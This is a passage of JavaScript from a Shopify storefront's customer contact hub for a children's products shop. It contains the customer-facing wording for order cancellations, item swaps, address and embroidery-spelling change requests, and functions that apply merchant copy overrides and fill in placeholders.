  "ineligible.cancel.advice": "<strong>What you can usually still do.</strong> Once your parcel reaches your local delivery service, most of them let you hold it at a depot or pick-up point, redirect it nearby, or choose a different day — arranged directly with them, using the tracking number above. Our tracking page is where to watch for that first delivery attempt.",
  "ineligible.gone.heading": "This one has already left us",
  "ineligible.gone.body": "Your order has been packed and handed to {carrier}, so we can no longer {what}. We would rather tell you that straight out than promise something and take it back.",
  "ineligible.gone.returnsNote": "<strong>What you can do instead:</strong> once the wrong item arrives you can send it back. You have 14 days from the day it lands to start that, and you do it through your Little Cubs account.",

  /* ---- the 12-hour policy backstop note --------------------------------- */
  "policy.actionable.body": "<strong>Good news.</strong> Your order was placed {hours} hours ago, which is past our usual {window}-hour changes window — but we have checked {why}",
  "policy.actionable.whyIntercept": "and your order has a label on it but has not left us yet, so it is still worth asking.",
  "policy.actionable.whyOpen": "and our records show it has not been packed yet, so there is a good chance we can still catch it.",
  "policy.packed.body": "Your order was placed only {hours} hours ago, but it has already been packed and collected. Our dispatch runs once a day, {days}, and sometimes catches an order within the hour.",

  /* ---- TRACKING_ASSIGNED — the "we will ask" card ----------------------- */
  "intercept.heading": "We will ask — we can often still catch it",
  "intercept.body1": "Your order has been packed and labelled ready to go, but as far as we can tell it has not left our packing team yet. At this stage they can <strong>often</strong> still pull it back off the pile if we ask them quickly. So that is what we will do.",
  "intercept.number": "Your tracking number is <strong>{number}</strong>. That number appears when the label is printed, not when the parcel leaves — a parcel can sit here with a number on it for a while before it is collected.",
  "intercept.body2": "<strong>We cannot promise it, and we would rather say so.</strong> Sometimes they reach it in time and sometimes the parcel has already gone out of the door. We will send your request through straight away and email you the moment they reply, usually within a working day.",
  "intercept.body3": "Nothing is charged, refunded or changed until they answer. If they cannot {what} in time, we will tell you straight away and help you sort it out from there.",
  "intercept.what.stop": "stop it",
  "intercept.what.change": "change it",
  "intercept.what.redirect": "redirect it",
  "intercept.successNote": "Your order was already packed and labelled when you asked, so this one is genuinely uncertain — they can often still catch it at that stage, but not always. We will tell you either way. Please do not place a replacement order in the meantime.",

  /* ---- "you have already sent this" ------------------------------------- */
  "already.heading": "You have already sent this request",
  "already.body": "Your {what} for order {order} is with our packing team{reference}. Sending it again would not make it happen any faster — it would just create a second ticket and slow us down.",
  "already.reference": " as request <strong>{id}</strong>",
  "already.note": "We will email you as soon as they reply, usually within a working day. If something has changed in the meantime, just reply to that email and it will reach the same person.",
  "request.label.cancel": "cancellation request",
  "request.label.amend": "change request",
  "request.label.spelling": "spelling change request",
  "request.label.address": "address change request",

  /* ---- cancel my order --------------------------------------------------- */
  "cancel.heading": "Cancel my order",
  "cancel.stepNote.intercept": "We have checked the real status of your order — not a clock — and it has been labelled but not collected yet.",
  "cancel.stepNote.open": "We have checked the real status of your order — not a clock — and our records show it has not been packed yet.",
  "cancel.eligible.heading": "Yes — we can ask for this to be stopped",
  "cancel.eligible.body1": "Everything we can see says your order is still with our packing team, so we can send a stop request straight away.",
  "cancel.eligible.body2": "<strong>One honest caveat.</strong> Our packing partner has to confirm it before anything is final. We will email you as soon as they reply, usually within a working day. Nothing is charged or refunded until then.",
  "cancel.items.heading": "What would be cancelled",
  "cancel.seelNote": "Your Worry-Free Purchase cover is Seel's, not ours, so it is not listed here. Anything to do with that charge is between you and Seel — we cannot refund or cancel it for you.",
  "cancel.reason.label": "Anything you would like us to pass on? (optional)",
  "cancel.reason.hint": "Not required — but it helps us improve.",
  "cancel.reason.placeholder": "e.g. I ordered by mistake",
  "cancel.submit": "Request cancellation",
  "cancel.keep": "No, keep my order",
  "cancel.success.heading": "Your cancellation request is in",
  "cancel.success.blurb": "We have asked our packing team to stop order {order}. Nothing is final until they confirm — we will email {email} as soon as they reply, usually within a working day.",

  /* ---- change what I ordered --------------------------------------------- */
  "amend.heading": "Change what I ordered",
  "amend.stepNote.intercept": "Your order has been labelled but has not left us yet, so we can still ask for it to be changed. This is a <strong>request</strong> — our packing team has to confirm it, and at this stage they can often catch it, but not always.",
  "amend.stepNote.open": "Our records show your order has not been packed yet, so there is a good chance we can catch it. This is a <strong>request</strong> — our packing team has to confirm it before anything changes.",
  "amend.step1.heading": "1. Which item?",
  "amend.seelNote": "Your Worry-Free Purchase protection is not listed — it is cover for your parcel, not an item we post.",
  "amend.step2.heading": "2. What would you like to happen?",
  "amend.action.reduce.title": "Reduce the quantity",
  "amend.action.reduce.body": "You ordered more than you meant to.",
  "amend.action.swap.title": "Swap it for something else",
  "amend.action.swap.body": "Wrong colour, wrong size, wrong product.",
  "amend.qty.label": "New quantity",
  "amend.qty.hint": "If our packing team can catch it in time, we will sort out the difference with you before anything ships.",
  "amend.swap.heading": "Choose what to send instead",
  "amend.swap.help": "Pick one product or several — you can match the value of what you are swapping out, up to {max} of any one item. Everything here is a request until our packing team confirms it.",
  "amend.reason.label": "Tell us briefly what happened",
  "amend.reason.hint": "One line is plenty. We pass this straight to our packing team, so it is worth being specific.",
  "amend.reason.placeholder": "e.g. I clicked twice by mistake and ended up with two",
  "amend.submit": "Send my change request",
  "amend.submit.payDifference": "Continue to checkout to pay the difference",
  "amend.err.reason": "Please tell us what happened — our packing team needs it to act.",
  "amend.err.qty": "Please enter a number between 0 and {max}. To add more, please place a new order.",
  "amend.err.swapEmpty": "Please choose at least one product to send instead.",
  "amend.desired.nothing": "nothing (remove this item)",
  "amend.success.heading": "Your change request is in",
  "amend.success.blurb": "We have asked our packing team to change order {order} before it goes out. This is a request, not a done deal — we will email {email} as soon as they reply.",
  "amend.success.note": "If they can catch it in time and the new items cost less, we will sort out the difference with you before anything ships — we will set out your options in that email.",

  /* ---- the swap product picker ------------------------------------------ */
  "swap.search.label": "Search our products",
  "swap.search.hint": "Type a product name — “tent”, “flash cards”, “dominoes”. Leave it blank to see everything.",
  "swap.search.placeholder": "e.g. pool tent",
  "swap.addMore": "Add more products",
  "swap.card.options": "{n} options",
  "swap.card.from": "from ",
  "swap.card.outOfStock": "Out of stock",
  "swap.card.outOfStockLabel": "{title}, {price}, currently out of stock",
  "swap.card.addLabel": "Add {title}, {price}",
  "swap.empty.query": "Nothing matches “{query}”. Try a shorter word, or clear the box to see everything.",
  "swap.empty.none": "No products to show.",
  "swap.count.one": "1 product found.",
  "swap.count.many": "{n} products found.",
  "swap.line.option": "Option",
  "swap.line.variantOutOfStock": " (out of stock)",
  "swap.line.qty": "Quantity",
  "swap.line.qtyLabel": "Quantity of {title}",
  "swap.line.decrease": "Decrease quantity of {title}",
  "swap.line.increase": "Increase quantity of {title}",
  "swap.line.price": "{qty} × {unit} = {total}",
  "swap.line.remove": "Remove",
  "swap.line.removeLabel": "Remove {title} from this swap",
  "swap.say.clamped": "Quantity set to {qty}. {max} is the most you can add here.",
  "swap.say.removed": "{title} removed.",
  "swap.say.alreadyAtMax": "{title} is already in your list, and {max} is the most you can add here.",
  "swap.say.increased": "{title} is already in your list — quantity increased to {qty}.",
  "swap.say.added": "{title} added. Choose its options and quantity below.",
  "swap.total.out": "Swapping out ",
  "swap.total.in": "Adding ",
  "swap.total.toPay": "{amount} to pay",
  "swap.total.refund": "{amount} still to come back to you",
  "swap.total.even": "Even swap — nothing to pay either way",

  /* ---- the pay-the-difference hand-off ---------------------------------- */
  "swapCheckout.back": "Back to my change request",
  "swapCheckout.heading": "There is a difference to pay",
  "swapCheckout.intro": "What you have picked is worth more than the item you are swapping out, so this one cannot be finished on this page.",
  "swapCheckout.out.heading": "What you are swapping out",
  "swapCheckout.in.heading": "What you would like instead",
  "swapCheckout.next.heading": "What happens now",
  "swapCheckout.next.body1": "Email <a href=\"mailto:{email}\">{email}</a> quoting <strong>{order}</strong> and we will pick this up by hand. If your order has not been packed by then, we will put the value of the item you are swapping out towards the new one and send you a link for the difference only — if it has already gone out we will tell you straight away and set out your options.",
  "swapCheckout.next.body2": "Matching this up against your original order — crediting what comes out and charging only the difference — has to be done on our side by a person. <strong>Reconciling this against the original order is a backend job, not something this page can finish alone.</strong>",
  "swapCheckout.next.body3": "Nothing has been sent to our packing team yet, and your order has not been changed. If you would rather pick something closer in value, go back and adjust it.",
  "swapCheckout.cta.heading": "Continue to checkout",
  "swapCheckout.cta.body": "We cannot take the difference on this page yet — the payment link has to be raised against your existing order, by hand, so that you are only charged {amount} and not the full price again.",
  "swapCheckout.cta.button": "Continue to checkout to pay the difference",
  "swapCheckout.cta.subject": "Swap with a difference to pay — {order}",
  "swapCheckout.cta.note": "This opens an email to us with your order number filled in. We reply with a payment link for the difference only, usually within a working day.",
  "swapCheckout.adjust": "Go back and adjust my swap",
  "swapCheckout.stub.heading": "Prototype stub — not wired up",
  "swapCheckout.stub.chip": "handoff",
  "swapCheckout.stub.body1": "This is the Shopify cart permalink the button <em>would</em> open. It is shown, not followed:",
  "swapCheckout.stub.body2": "<strong>Why it is not followed.</strong> That link builds a brand new cart at full price. It knows nothing about {order}, so the customer would pay for the replacements and still be owed {amount} for the item they swapped out. Crediting the removed line and issuing a matching discount code are Admin API writes behind human approval.",

  /* ---- change shipping address ------------------------------------------ */
  "address.heading": "Change shipping address",
  "address.stepNote.intercept": "Your order has been labelled but has not left us yet, so we can still ask for it to be sent somewhere else. Take your time — you will see everything side by side before anything is sent.",
  "address.stepNote.open": "Our records show your order has not been packed yet, so there is a good chance we can catch it and send it somewhere else. Take your time — you will see everything side by side before anything is sent.",
  "address.current.heading": "Where it is going now",
  "address.current.chip": "current address",
  "address.form.heading": "Where should it go instead?",
  "address.form.nameLabel": "Contact name",
  "address.form.phoneLabel": "Contact phone number",
  "address.form.phoneHint": "Shipping carriers need this if there is a problem delivering your parcel.",
  "address.form.phonePlaceholder": "+64 21 555 0147",
  "address.form.companyLabel": "Company",
  "address.form.addr1Label": "Address line 1",
  "address.form.addr2Label": "Address line 2",
  "address.form.cityLabel": "Town or city",
  "address.form.provinceLabel": "State, region or province",
  "address.form.zipLabel": "Postcode or ZIP",
  "address.form.countryLabel": "Country",
  "address.form.next": "Next",
  "address.form.reassure": "Nothing is sent yet — <strong>Next</strong> only takes you to a screen where you can check it and change your mind.",
  "address.poBox.hint": "Street address please — we're not able to deliver to PO Boxes.",
  "address.poBox.help": "Could you give us a street address instead? A work address, or a neighbour or family member who's home during the day, works perfectly.",
  "address.poBox.reason": "We can't ship to {kind}. Our courier hands parcels to a person at the door, so anything sent there comes back to us.",
  "address.poBox.kind.po_box": "PO Boxes",
  "address.poBox.kind.post_office_box": "Post Office Boxes",
  "address.poBox.kind.pob": "PO Boxes",
  "address.poBox.kind.po_hash": "PO Boxes",
  "address.poBox.kind.intl_po_box": "PO Boxes",
  "address.poBox.kind.bag": "Private or Locked Bags",
  "address.poBox.kind.private_box": "Private Boxes",
  "address.poBox.kind.poste_restante": "Poste Restante addresses",
  "address.poBox.kind.general_delivery": "General Delivery addresses",
  "address.poBox.kind.parcel_locker": "Parcel Lockers",
  "address.poBox.kind.community_mail_box": "Community Mail Boxes",
  "address.poBox.kind.dx_box": "DX Boxes",
  "address.poBox.kind.rural_route_box": "Rural Route boxes",
  "address.poBox.kind.standalone_box": "PO Boxes",
  "address.poBox.kind.po_number": "PO Boxes",
  "address.poBox.kind.standalone_bag": "Postal Bags",
  "address.poBox.kind.rpo": "postal outlet addresses",
  "address.poBox.kind.cmb": "Community Mail Boxes",
  "address.err.name": "Please tell us who the parcel is for.",
  "address.err.addr1": "Please enter the street address.",
  "address.err.city": "Please enter the town or city.",
  "address.err.zip": "Please enter the postcode or ZIP.",
  "address.err.country": "Please enter the country.",
  "address.lost.body1": "We have lost track of which order you were changing — this usually means the page sat idle for a while. Nothing has been sent.",
  "address.lost.body2": "Please look your order up again and re-enter the new address.",
  "address.review.heading": "Please check this carefully",
  "address.review.back": "← Edit the new address",
  "address.review.intro": "Your current address is shown first and the new one after it. {summary} Anything highlighted in the new address is different from what we have now.",
  "address.review.noChanges": "Nothing looks different yet — go back if you meant to change something.",
  "address.review.oneChange": "One line has changed.",
  "address.review.manyChanges": "{n} lines have changed.",
  "address.review.currentHeading": "Current Address",
  "address.review.newHeading": "New Address",
  "address.review.changedSr": "Changed. {field}: ",
  "address.review.changedFlag": "changed",
  "address.review.blankLine": "{field} — you left this blank",
  "address.review.next.heading": "What happens next",
  "address.review.next.body": "We will send this to our packing team straight away. They have to confirm it before the address actually changes — we will email you either way, usually within a working day. Please double-check the street number and postcode before you send it.",
  /* CLIENT-SPECIFIED WORDING, VERBATIM. Overridable, but this default must not
     change by a character — see the note in the brief and in the schema. */
  "address.review.confirmLabel": "I confirm the changes to my order's delivery address are correct and I understand that once completed no further changes can be made to my order.",
  "address.review.complete": "Complete Request",
  "address.review.completeReady": "Complete Request ✓ ready",
  "address.review.goBack": "Go back and edit",
  "address.review.hintTick": "Tick the box above to enable this button.",
  "address.review.hintReady": "Ready to send.",
  "address.review.hintRetry": "Ready to try again.",
  "address.review.sayTick": "Please tick the confirmation box first.",
  "address.field.name": "Contact name",
  "address.field.phone": "Phone",
  "address.field.company": "Company",
  "address.field.address1": "Address line 1",
  "address.field.address2": "Address line 2",
  "address.field.city": "Town or city",
  "address.field.province": "State / region",
  "address.field.zip": "Postcode / ZIP",
  "address.field.country": "Country",
  "address.success.heading": "Your address change request is in",
  "address.success.blurb": "We have asked our packing team to send order {order} to the new address. They have to confirm it before anything actually changes — we will email {email} as soon as they reply, usually within a working day.",
  "address.success.note": "If they cannot catch it in time we will tell you straight away and help you sort it out from there. In the meantime, please do not place a replacement order.",

  /* ---- fix my spelling --------------------------------------------------- */
  "spelling.title": "Fix my spelling",
  "spelling.stepNote.intercept": "Your order has been labelled but has not left us yet, so it is still worth asking. We cannot tell from here whether the stitching has started — our packing team has to check that and confirm.",
  "spelling.stepNote.open": "Our records show your order has not been packed yet, so there is a good chance we can catch it. We cannot tell from here whether the stitching has started, so this is a <strong>request</strong> our packing team has to confirm.",
  "spelling.none.heading": "There is nothing personalised on this order",
  "spelling.none.body1": "Order {order} does not have a name saved against any of its items, so there is no spelling for us to change.",
  "spelling.none.body2": "If you meant to change something else about what you ordered — the wrong colour, the wrong size, or one too many — that is the next button below and it takes about a minute.",
  "spelling.none.body3": "If you are sure you typed a name in when you ordered, please <a href=\"{mailHref}\">email us about this order</a> — it may not have saved, and we would rather fix that now than after it is made.",
  "spelling.none.subject": "Personalised name missing from {order}",
  "spelling.none.amendButton": "Change what I ordered",
  "spelling.pick.intro": "There is more than one personalised item on this order. Which spelling would you like to change?",
  "spelling.pick.heading": "Which one?",
  "spelling.pick.hint": "The name we have saved is shown first, in large type, so you can tell them apart.",
  "spelling.pick.submit": "Change this spelling",
  "spelling.current.heading": "What we have saved",
  "spelling.current.chip": "current spelling",
  "spelling.current.note": "This is the name we will stitch on <strong>{item}</strong>.",
  "spelling.form.heading": "How should it be spelled?",
  "spelling.form.label": "New spelling",
  "spelling.form.rules": "Letters, spaces, hyphens and apostrophes only — up to %%maxLength%% characters. Emoji and symbols cannot be stitched.",
  "spelling.form.readBack": "Please read this back",
  "spelling.form.echoEmpty": "Nothing typed yet",
  "spelling.form.count": "{n} of {max} characters used",
  "spelling.form.readBackNote": "This is exactly what we will ask them to stitch — every letter, in this order.",
  "spelling.form.next": "Next",
  "spelling.form.stripped": "We have left out a character that cannot be stitched — the rest is exactly as you typed it.",
  "spelling.form.nonLatin": "Our embroidery template only holds the Latin alphabet, so we cannot stitch this name as typed. Please write it in Latin letters, or email us at %%supportEmail%% and we will see what we can do.",
  "spelling.form.truncated": "That is as many letters as we can stitch — {max} is the limit.",
  "spelling.form.needLetter": "Please include at least one letter.",
  "spelling.form.empty": "Please type the name as it should be stitched.",
  "spelling.form.unchanged": "That is exactly what we have saved already, so there is nothing to change. If it is right, you can close this page.",
  "spelling.lost.body": "We have lost track of which item you were changing — this usually means the page sat idle for a while. Nothing has been sent.",
  "spelling.review.heading": "Please check this carefully",
  "spelling.review.back": "← Edit the spelling",
  "spelling.review.intro": "This is the name we will ask them to stitch onto {item}. If they can still change it, this is what it will say — and once it is made it cannot be unpicked, so it is worth reading out loud.",
  "spelling.review.currentHeading": "Current spelling",
  "spelling.review.newHeading": "New spelling",
  "spelling.review.changedSr": "Changed. New spelling: ",
  "spelling.review.next.heading": "What happens next",
  "spelling.review.next.body1": "We will send this to our packing team straight away.",
  "spelling.review.next.body2": "<strong>One honest caveat.</strong> We cannot see from here whether the stitching has already started, so they have to confirm it before anything changes. {caveat}we will email {email} either way, usually within a working day.",
  "spelling.review.next.caveatIntercept": "Your order is already packed and labelled, so this one is genuinely uncertain — ",
  "spelling.review.next.caveatOpen": "At this stage they can usually still catch it — ",
  "spelling.review.confirmLabel": "I confirm the new spelling above is exactly how it should be stitched.",
  "spelling.success.heading": "Your spelling change request is in",
  "spelling.success.blurb": "We have asked our packing team to stitch \"{next}\" instead of \"{current}\" on order {order}. They have to confirm it before anything changes — we will email {email} as soon as they reply, usually within a working day.",
  "spelling.success.note": "We cannot see from here whether the stitching has already started, so we would rather not promise. If they cannot change it in time we will tell you straight away and set out your options. Please do not place a replacement order in the meantime.",

  /* ---- the shared success screen ---------------------------------------- */
  "success.chip.request": "Request {id}",
  "success.internal.heading": "What happens behind the scenes",
  "success.internal.body": "Two things are created automatically. Below is the request this page sent, as it was sent — our backend composes the final wording and re-checks everything in it. This is a preview for the Little Cubs team, not something the customer would normally see.",
  "preview.title": "Message to our packing team",
  "preview.only": "preview only",
  "preview.notion.heading": "Notion task",
  "preview.notion.checked": "✓ checked",
  "preview.notion.unchecked": "unchecked",

  /* ---- what we say when a send does not succeed -------------------------- */
  "submit.what.cancel": "stop this order",
  "submit.what.amend": "change what was ordered",
  "submit.what.spelling": "change the spelling",
  "submit.what.address": "change the delivery address",
  "submit.orderFallback": "your order",
  "submit.emailFallback": "you",
  "submit.frag.safe": " It is safe to press it more than once — we only ever act on one request per change, so a second press cannot create a second ticket.",
  "submit.frag.mail": " If it still will not go through, email {support} with your order number and we will do it for you.",
  "submit.frag.notSent": "We have NOT sent this to our packing team. ",
  "submit.network.text": "We did not get an answer back, so we cannot confirm your request reached our packing team — please assume it did not. Nothing you have filled in has been lost. Please check your connection and press the button again.{safe}",
  "submit.network.announce": "Not confirmed. We did not get an answer back, so assume the packing team have not been told. You can safely try again.",
  "submit.inFlight.text": "This same request is already being sent from another window or tab, and we cannot confirm from here whether it has reached our packing team yet. Please do not send another one — that would only risk a second ticket. Check the other window if you still have it open, and either way we will email {email} with what happens. If you have heard nothing by tomorrow, email {support} with your order number.",
  "submit.inFlight.announce": "Not confirmed. The same request is already being sent from another window, so do not send a second one.",
  "submit.render.text": "Your request WAS sent and our packing team have been told{reference}. Something went wrong building the confirmation screen for you, which is our fault and nothing to do with your request. Please do not send it again. We will email {email} as soon as they reply.",
  "submit.render.reference": " — your reference is {id}",
  "submit.render.announce": "Sent. The packing team have been told{reference}. The confirmation screen could not be shown. Do not send it again.",
  "submit.render.announceReference": ", request {id}",
  "submit.unavailable.text": "Your request has NOT been sent. Something on our side is not working, so our packing team have not been told — that is our fault, not yours, and nothing you have filled in has been lost. Please try again in a minute.{safe}{mail}",
  "submit.unavailable.announce": "Not sent. Something on our side failed and the packing team have not been told. You can safely try again.",
  "submit.tooMany.text": "{notSent}We have had several attempts on order {order} in the last day, so we have paused this button to make sure the packing team are not sent the same thing several times over. If one of those went through, we will email {email} as soon as they reply. If you are not sure it did, email {support} with your order number and a person will pick it up straight away — please do not keep pressing.",
  "submit.tooMany.announce": "Not sent. There have been several attempts on this order, so this button is paused. Email us if you are not sure one went through.",
  "submit.cancelled.text": "Order {order} has already been cancelled, so there is nothing left to {what} and we have not sent anything to our packing team. If you were expecting a refund and have not seen it, email {support} and we will check for you.",
  "submit.cancelled.announce": "Not sent. This order is already cancelled.",
  "submit.onHold.text": "{notSent}Order {order} is already paused with them while we deal with an earlier request, and a second one would only slow that down. We will email {email} as soon as they reply — there is nothing else you need to do.",
  "submit.onHold.announce": "Not sent. This order is already paused while an earlier request is dealt with.",
  "submit.unconfirmed.text": "{notSent}We could not confirm what stage order {order} is at just now, and we would rather not send them something we are not sure about. Please email {support} with your order number and a person will pick it up straight away.",
  "submit.unconfirmed.announce": "Not sent. We could not confirm the state of this order, so a person needs to look at it.",
  "submit.gone.subjectPart": "Part of order {order} was",
  "submit.gone.subjectWhole": "Order {order} was",
  "submit.gone.text": "{subject} pulled for packing while you were filling this in. Orders go over to our packing team in batches and yours went into one at just the wrong moment — that is timing, not anything you did. It does mean we have NOT sent this request — they can no longer {what} before it goes out. We will email {email} with the tracking details as soon as they come through, and if anything is wrong when it arrives, tell us and we will put it right.{returns}",
  "submit.gone.returns": " If the wrong item does arrive, our returns and refunds page sets out the next step.",
  "submit.gone.announce": "Not sent. Your order was already pulled for packing, so the packing team could not be asked to {what}.",
  "submit.poBox.address.text": "{notSent}We cannot deliver to a PO Box, a locker or a mail centre — the courier returns those parcels to us{field}. Please go back and give us a street address we can deliver to.",
  "submit.poBox.address.field": ", and the {field} looks like one",
  "submit.poBox.address.announce": "Not sent. We cannot deliver to a PO Box, so the address needs changing before this can go.",
  "submit.poBox.item.text": "{notSent}The name of the {field} on this request reads like a PO Box or a locker, and the courier returns those parcels to us. That is not something you can fix on this screen — please go back and choose a different item, or email {support} with your order number and we will sort it out for you.",
  "submit.poBox.item.announce": "Not sent. The {field} on this request looks like a PO Box, which we cannot use.",
  "submit.poBox.note.text": "{notSent}The note you added asks us to send the parcel to a PO Box or a locker, and the courier returns those to us. Please take that out of your note and send it again — if the parcel needs to go somewhere else, use “Change shipping address” instead.",
  "submit.poBox.note.announce": "Not sent. Your note asks for delivery to a PO Box, which we cannot use.",
  "submit.incompleteAddress.text": "{notSent}The new address is missing its {field}, and they cannot work from an address that is not complete. Please go back and add it.",
  "submit.incompleteAddress.announce": "Not sent. The new address is missing its {field}.",
  "submit.invalidAddress.text": "{notSent}We could not make sense of the {field} on the new address. Please go back and check it.",
  "submit.invalidAddress.announce": "Not sent. We could not read the {field} on the new address.",
  "submit.invalidName.tooLong": "Our embroidery template holds up to {limit} characters, and the spelling you gave is longer than that. Please go back and shorten it.",
  "submit.invalidName.disallowed": "There is a character in that spelling our embroidery template cannot stitch — letters, spaces, hyphens and apostrophes only. Please go back and try it a different way.",
  "submit.invalidName.noLetter": "A spelling needs at least one letter in it. Please go back and try again.",
  "submit.invalidName.other": "We cannot stitch that spelling as it is written. Please go back and try it a different way.",
  "submit.invalidName.announce": "Not sent. That spelling cannot be stitched as it is written.",
  "submit.unchanged.text": "That is already the spelling on your order, so there is nothing for anyone to change and we have not sent anything to our packing team.",
  "submit.unchanged.announce": "Not sent. That is already the spelling on your order.",
  "submit.noSuchItem.text": "{notSent}We could not find that item on order {order} any more. Please go back to the start of this step and choose the item again.",
  "submit.noSuchItem.announce": "Not sent. That item is no longer on the order.",
  "submit.noMatch.text": "{notSent}Your details did not match the order when we checked them again, so nothing has reached them. Please start again with “Not your order? Start again” and look the order up once more.{mail}",
  "submit.noMatch.announce": "Not sent. Your details did not match the order when we checked again.",
  "submit.unknown.text": "Your request has NOT been sent — we got an answer back that we did not understand, so our packing team have not been told. Nothing you have filled in has been lost. Please try again.{safe}{mail}",
  "submit.unknown.announce": "Not sent. The packing team have not been told. You can safely try again.",
  "submit.relayNote": "One thing we should be straight about: the automatic message to our packing team did not go through this time, so someone here will pass it on by hand. Your request is safely recorded either way and we will still email you.",
  "submit.recordNote": "Our packing team have your request, but our own copy of it did not save properly, so please keep the confirmation email we send you. If you have not heard back by the end of the next working day, reply to that email or write to {support} with your order number and we will pick it straight up.",
  "submit.announce.sent": "Sent. Your {what} is with our packing team{reference}.",
  "submit.announce.reference": ", request {id}",
  "submit.announce.relayFailed": " The automatic message did not go through, so someone here will pass it on by hand.",

  /* Human names for the address fields the Worker can name in `field`. */
  "submit.field.fallback": "address",
  "submit.field.address1": "first address line",
  "submit.field.address2": "second address line",
  "submit.field.city": "town or city",
  "submit.field.province": "state or region",
  "submit.field.zip": "postcode",
  "submit.field.country": "country",
  "submit.field.phone": "phone number",
  "submit.field.name": "contact name",
  "submit.field.company": "company",
  "submit.field.reason": "note",
  "submit.field.requestedItem": "requested item",
  "submit.field.currentItem": "current item"
};

/* The eleven settings that shipped before the dictionary. Their ids are kept so
   nothing a merchant has typed is lost; the VALUE lands on the key beside it. */
var COPY_LEGACY_KEYS = {
  carrierGeneric:       "shared.carrierGeneric",
  poBoxHelp:            "address.poBox.help",
  poBoxHint:            "address.poBox.hint",
  addressConfirmLabel:  "address.review.confirmLabel",
  phoneHint:            "address.form.phoneHint",
  phonePlaceholder:     "address.form.phonePlaceholder",
  spellingConfirmLabel: "spelling.review.confirmLabel",
  spellingRules:        "spelling.form.rules",
  spellingStripped:     "spelling.form.stripped",
  spellingNonLatin:     "spelling.form.nonLatin",
  spellingNeedLetter:   "spelling.form.needLetter"
};

/* Layers 2 and 3, flattened into one lookup. Rebuilt from CONFIG on every boot,
   so the theme editor's live re-render picks up an edited setting. */
var COPY_OVERRIDES = {};

/* Keys asked for that this file does not know about. Reported ONCE each, and
   only where somebody is in a position to act on it:

     * the standalone prototype, which has no #lc-hub-config element at all;
     * the theme editor (Shopify.designMode), which is where a copy_override
       block is actually typed and therefore where a typo is made.

   NOT on an ordinary storefront page view. A customer cannot fix a mistyped
   key, and a warning on every session is noise in someone else's console. They
   are not left guessing either way: t() renders the key itself, which is
   visible on the page and greppable in COPY-KEYS.md. */
var COPY_MISSING = {};
function lcCopyShouldWarn() {
  try {
    if (!document.getElementById("lc-hub-config")) return true;          // prototype
    return !!(window.Shopify && window.Shopify.designMode);              // theme editor
  } catch (e) { return false; }
}

function lcCopySet(map, key, value) {
  var k = String(key == null ? "" : key).trim();
  if (!k) return;
  /* A CLEARED SETTING IS "NOT SET". Shopify sends "" for a text field the
     merchant emptied, and rendering an empty heading or a nameless button is
     never what they meant. Fall through to the default instead. */
  if (value == null) return;
  var v = String(value);
  if (!v.trim()) return;
  map[k] = v;
}

function lcApplyCopyConfig() {
  var out = {};
  var legacy = (CONFIG && CONFIG.copy) || {};
  Object.keys(COPY_LEGACY_KEYS).forEach(function (id) {
    lcCopySet(out, COPY_LEGACY_KEYS[id], legacy[id]);
  });
  var grouped = (CONFIG && CONFIG.copyText) || {};
  Object.keys(grouped).forEach(function (k) { lcCopySet(out, k, grouped[k]); });
  var blocks = (CONFIG && CONFIG.copyOverrides) || {};
  Object.keys(blocks).forEach(function (k) { lcCopySet(out, k, blocks[k]); });
  COPY_OVERRIDES = out;

  /* THE OTHER HALF OF "NEVER FAIL SILENTLY". t() reports a key the CODE asks
     for and cannot find, which is a bug in this file. This reports the mirror
     case, which is the one a merchant actually hits: an override typed against
     a key that does not exist. Nothing renders it, so without this the only
     symptom is that their edit does nothing at all — and "the setting is
     broken" is the conclusion they will reach. Same audience gate as t(): the
     prototype and the theme editor, not a customer's console. */
  if (window.console && console.warn && lcCopyShouldWarn()) {
    var unknown = Object.keys(out).filter(function (k) {
      return !Object.prototype.hasOwnProperty.call(COPY, k);
    });
    if (unknown.length) {
      console.warn("[contact-hub] copy override" + (unknown.length > 1 ? "s" : "") +
                   " for key" + (unknown.length > 1 ? "s" : "") + " the hub does not have: " +
                   unknown.join(", ") + ". Nothing on the page will change. Check the " +
                   "spelling against shopify/COPY-KEYS.md — keys are case-sensitive.");
    }
  }
  return out;
}

/* %%token%% -> value. The same map the FAQ answers have always used, plus
   %%maxLength%%, so a merchant writing a copy override never has to hard-code a
   URL, an email address or the embroidery limit. */
function lcTokenMap() {
  return {
    supportEmail:      CONFIG.store.supportEmail,
    storeName:         CONFIG.store.name,
    shippingPolicy:    CONFIG.urls.shippingPolicy,
    refundPolicy:      CONFIG.urls.refundPolicy,
    faqPage:           CONFIG.urls.faqPage,
    poolTentVideo:     CONFIG.urls.poolTentVideo,
    poolTentVideoFile: CONFIG.urls.poolTentVideoFile,
    allProducts:       CONFIG.urls.allProducts,
    trackingApp:       CONFIG.urls.trackingApp,
    returnsHub:        CONFIG.urls.returnsHub,
    seelResolve:       CONFIG.urls.seelResolve,
    maxLength:         String(personalisationMaxLength())
  };
}

function lcResolveTokens(s) {
  if (String(s).indexOf("%%") === -1) return s;      // the overwhelming majority
  var map = lcTokenMap();
  return String(s).replace(/%%(\w+)%%/g, function (m, k) {
    return Object.prototype.hasOwnProperty.call(map, k) ? String(map[k]) : m;
  });
}

/* ---------------------------------------------------------------------------
   t(key, vars) — THE ONLY WAY A USER-FACING STRING REACHES THE SCREEN.

   Resolution order: override -> built-in default -> the key itself. The last of
   those is the "never render blank" guarantee: a missing key is a bug in a
   copy_override block or in this file, and a visible, greppable key is the one
   outcome that gets it fixed. A blank heading, a nameless button or an empty
   error message would not.
   ------------------------------------------------------------------------- */
function t(key, vars) {
  var k = String(key == null ? "" : key);
  var v = Object.prototype.hasOwnProperty.call(COPY_OVERRIDES, k) ? COPY_OVERRIDES[k] : null;
  if (v == null) v = Object.prototype.hasOwnProperty.call(COPY, k) ? COPY[k] : null;
  if (v == null) {
    if (!COPY_MISSING[k]) {
      COPY_MISSING[k] = true;
      if (window.console && console.warn && lcCopyShouldWarn()) {
        console.warn("[contact-hub] no copy for key \"" + k + "\" — rendering the key. " +
                     "See shopify/COPY-KEYS.md for the list of valid keys.");
      }
    }
    return k;
  }
  v = String(v);
  if (vars) {
    v = v.replace(/\{(\w+)\}/g, function (m, name) {
      /* An unknown placeholder is left as written rather than printed as
         "undefined": a merchant who drops one from an override loses a value,
         not the sentence around it. */
      if (!Object.prototype.hasOwnProperty.call(vars, name)) return m;
      var pv = vars[name];
      return pv == null ? "" : String(pv);
    });
  }
  return lcResolveTokens(v);
}

lcApplyCopyConfig();

/* ------------------------------------------------------------------------ */

/* ===========================================================================
